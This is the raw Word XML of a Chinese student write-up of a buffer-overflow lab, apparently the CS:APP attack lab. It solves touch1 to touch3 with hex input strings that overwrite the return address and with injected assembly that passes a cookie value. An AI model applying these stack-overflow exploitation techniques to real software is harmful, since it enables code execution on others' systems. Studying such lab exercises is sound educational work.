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C0" w:rsidRDefault="006D5AE4" w:rsidP="006D5AE4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5AE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>缓冲区溢出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5AE4" w:rsidRDefault="006D5AE4" w:rsidP="006D5AE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缓冲区溢出需要完成三个任务，任务内容和解决方法如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5AE4" w:rsidRDefault="006D5AE4" w:rsidP="006D5AE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D5AE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Touch</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5AE4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5AE4" w:rsidRDefault="006D5AE4" w:rsidP="006D5AE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="560"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5AE4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Touch1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>的任务相对简单，完成对t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ouch1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>函数的调用即可，在t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函数中调用了g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>etbuf()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>函数，查看该函数的汇编可以知道g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>etbuf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>函数申请了0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>x28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>个字节，即4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个字节，在g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>etbuf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>函数中没有进行p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ush rb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>p的步骤，因此如果输入4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个字节则最后一个字节将直接覆盖函数的返回地址，即需要执行的下一条指令的地址，将其改为t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ouch1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>函数的地址即可。则需要构造的h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文件如下所示：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b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5AE4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5AE4" w:rsidRPr="006D5AE4" w:rsidRDefault="006D5AE4" w:rsidP="006D5AE4">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5AE4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>C0 17 40 00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5AE4" w:rsidRDefault="006D5AE4" w:rsidP="006D5AE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Touch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C0EE2" w:rsidRDefault="006D5AE4" w:rsidP="006D5AE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Touch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与Touch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类似，但是要求不仅仅是执行</w:t>
      </w:r>
      <w:r w:rsidR="00915023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Touch</w:t>
      </w:r>
      <w:r w:rsidR="00915023">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00915023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>函数，同时要求传入的参数和c</w:t>
      </w:r>
      <w:r w:rsidR="00915023">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ookie.txt</w:t>
      </w:r>
      <w:r w:rsidR="00915023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>文件中的内容一致，此时需要向缓冲区中写入我们自己的代码并执行。通过g</w:t>
      </w:r>
      <w:r w:rsidR="00915023">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:r w:rsidR="00915023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>调试可以知道b</w:t>
      </w:r>
      <w:r w:rsidR="00915023">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>uf</w:t>
      </w:r>
      <w:r w:rsidR="00915023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>缓冲区内容的开头地址为0</w:t>
      </w:r>
      <w:r w:rsidR="00915023">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>x5561dc78</w:t>
      </w:r>
      <w:r w:rsidR="00915023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，可以从该处写汇编代码借助g</w:t>
      </w:r>
      <w:r w:rsidR="00915023">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cc</w:t>
      </w:r>
      <w:r w:rsidR="00915023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>和o</w:t>
      </w:r>
      <w:r w:rsidR="00915023">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bjdump</w:t>
      </w:r>
      <w:r w:rsidR="00915023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>指令将其转为机器码。汇编代码如下所示</w:t>
      </w:r>
      <w:r w:rsidR="00915023">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00915023" w:rsidRDefault="001C0EE2" w:rsidP="006D5AE4">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>movq $</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0EE2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0x59b997fa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, %rdi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C0EE2" w:rsidRDefault="001C0EE2" w:rsidP="006D5AE4">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pushq $0x004017ec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C0EE2" w:rsidRDefault="001C0EE2" w:rsidP="006D5AE4">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C0EE2" w:rsidRDefault="001C0EE2" w:rsidP="006D5AE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ret会p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>op rsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>存储的指令并跳转执行，m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ovq</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>将c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ie中的数据写入r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>di</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>寄存器作为函数参数。将对应的机器代码写入缓冲区开头即可，如下所示：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48 c7 c7 fa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97 b9 59 68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ec 17 40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c3 00 00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1C0EE2" w:rsidRPr="00FF1172" w:rsidRDefault="001C0EE2" w:rsidP="001C0EE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1C0EE2" w:rsidRPr="00FF1172" w:rsidRDefault="001C0EE2" w:rsidP="001C0EE2">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF1172">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>78 dc 61 55</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5AE4" w:rsidRDefault="006D5AE4" w:rsidP="006D5AE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Touch3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF1172" w:rsidRDefault="00384E9A" w:rsidP="00FF117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ouch3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>要求将c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>以字符串的形式</w:t>
      </w:r>
      <w:r w:rsidR="00E93587">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>作为参数传到t</w:t>
      </w:r>
      <w:r w:rsidR="00E93587">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ouch3</w:t>
      </w:r>
      <w:r w:rsidR="00E93587">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>中，类似t</w:t>
      </w:r>
      <w:r w:rsidR="00E93587">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ouch2</w:t>
      </w:r>
      <w:r w:rsidR="00E93587">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，但是移到r</w:t>
      </w:r>
      <w:r w:rsidR="00E93587">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>di</w:t>
      </w:r>
      <w:r w:rsidR="00E93587">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>中的数据应该是一个地址而不是一个常数，需要将字符串的数据写入到缓冲区中以首地址的形式引用，简单地写到缓冲区的空白处可能会被覆盖，导致最后进行字符串比较时不一致，因此需要确保写入缓冲区的字符串不会被覆盖。有两种方法，第一种继续溢出缓冲区，但是要确保在溢出的过程中不能覆盖正常的数据导致程序出错；第二种</w:t>
      </w:r>
      <w:r w:rsidR="00FF1172">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>将字符串写入缓冲区中，但</w:t>
      </w:r>
      <w:r w:rsidR="00E93587">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>不直接将t</w:t>
      </w:r>
      <w:r w:rsidR="00E93587">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ouch3</w:t>
      </w:r>
      <w:r w:rsidR="00E93587">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>的地址压栈，而是同样存储在</w:t>
      </w:r>
      <w:r w:rsidR="00FF1172">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>缓冲区中，将r</w:t>
      </w:r>
      <w:r w:rsidR="00FF1172">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sp</w:t>
      </w:r>
      <w:r w:rsidR="00FF1172">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>直接移到该位置。这两种方法共同点是将rsp移到字符串之后，这样以来后续的操作覆盖字符串的可能性较小。两种方法的缓冲数据如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF1172" w:rsidRDefault="00FF1172" w:rsidP="00FF11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48 c7 c7 a8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dc 61 55 68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fa 18 40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c3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lastRenderedPageBreak/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78 dc 61 55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35 39 62 39</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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39 37 66 61</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF1172" w:rsidRDefault="00FF1172" w:rsidP="00FF1172">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF1172">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>方法二：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48 c7 c7 94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dc 61 55 48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c7 c4 8c dc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61 55 c3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  <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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fa 18 40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35 39 62 39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39 37 66 61</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF1172" w:rsidRPr="00FF1172" w:rsidRDefault="00FF1172" w:rsidP="00FF1172">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF1172">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF1172" w:rsidRPr="00FF1172" w:rsidRDefault="00FF1172" w:rsidP="00FF1172">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF1172">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>78 dc 61 55</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FF1172" w:rsidRPr="00FF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5E98"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A2482C20"/>
    <w:lvl w:ilvl="0" w:tplc="3962C5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A"/>
    <w:rsid w:val="001C0EE2"/>
    <w:rsid w:val="00384E9A"/>
    <w:rsid w:val="00400FC0"/>
    <w:rsid w:val="006D5AE4"/>
    <w:rsid w:val="00915023"/>
    <w:rsid w:val="00B531DA"/>
    <w:rsid w:val="00E7461F"/>
    <w:rsid w:val="00E93587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1C8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F5794644-D0E9-4E72-9006-31B608A2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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-02-11T09:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-11T10:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>